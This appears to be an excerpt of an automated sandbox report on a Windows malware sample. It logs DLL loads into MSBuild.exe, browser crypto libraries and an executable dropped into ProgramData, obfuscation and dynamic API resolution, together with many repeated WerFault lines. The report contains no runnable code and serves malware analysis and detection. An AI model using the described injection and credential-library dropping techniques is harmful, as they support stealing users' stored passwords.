Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\ProgramData\HCFIIIJJKJ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: VmRHSCaiyc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: VmRHSCaiyc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: VmRHSCaiyc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: VmRHSCaiyc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: VmRHSCaiyc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: VmRHSCaiyc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: VmRHSCaiyc.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: VmRHSCaiyc.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: MSBuild.exe, 00000005.00000002.1817684509.000000006D63D000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.5.dr, mozglue[1].dll.5.dr
Source:	Binary string: freebl3.pdb source: MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.5.dr, freebl3[1].dll.5.dr
Source:	Binary string: freebl3.pdbp source: MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.5.dr, freebl3[1].dll.5.dr
Source:	Binary string: nss3.pdb@ source: MSBuild.exe, 00000005.00000002.1817017421.000000006D39F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr
Source:	Binary string: softokn3.pdb@ source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.dr, softokn3[1].dll.5.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000005.00000002.1800280648.00000000381EE000.00000004.00000020.00020000.00000000.sdmp, vcruntime140[1].dll.5.dr, vcruntime140.dll.5.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000005.00000002.1794363422.000000002C30A000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.5.dr, msvcp140[1].dll.5.dr
Source:	Binary string: nss3.pdb source: MSBuild.exe, 00000005.00000002.1817017421.000000006D39F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr
Source:	Binary string: mozglue.pdb source: MSBuild.exe, 00000005.00000002.1817684509.000000006D63D000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.5.dr, mozglue[1].dll.5.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000005.00000002.1778653897.000000001A032000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788346120.000000001FFA8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.5.dr
Source:	Binary string: softokn3.pdb source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.dr, softokn3[1].dll.5.dr

Source: VmRHSCaiyc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: VmRHSCaiyc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: VmRHSCaiyc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: VmRHSCaiyc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: VmRHSCaiyc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

5_2_00418ADE

PE file contains sections with non-standard names

Source: sql[1].dll.5.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.5.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.5.dr	Static PE information: section name: .00cfg
Source: msvcp140[1].dll.5.dr	Static PE information: section name: .didat
Source: softokn3[1].dll.5.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.5.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.5.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.5.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.5.dr	Static PE information: section name: .didat
Source: softokn3.dll.5.dr	Static PE information: section name: .00cfg
Source: nss3.dll.5.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_003AC1AA push ecx; ret	4_2_003AC1BD
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_003571AD push ecx; ret	4_2_003571C0
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_003AC56A push cs; retn 0003h	4_2_003AC58D
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_003AC5D6 push 800003C3h; ret	4_2_003AC5DD
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_003AC654 push cs; retf 0003h	4_2_003AC655
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_003AEBED push 0000004Ch; iretd	4_2_003AEBFE
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_0039AE1D push ecx; ret	4_2_0039AE30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0042F2D2 push ecx; ret	5_2_0042F2E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00422EC9 push esi; ret	5_2_00422ECB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0041DF45 push ecx; ret	5_2_0041DF58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00432715 push 0000004Ch; iretd	5_2_00432726
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002D71AD push ecx; ret	15_2_002D71C0

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\HCFIIIJJKJ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\a43486128347[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\sql[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\vcruntime140[1].dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\HCFIIIJJKJ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

5_2_00418ADE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
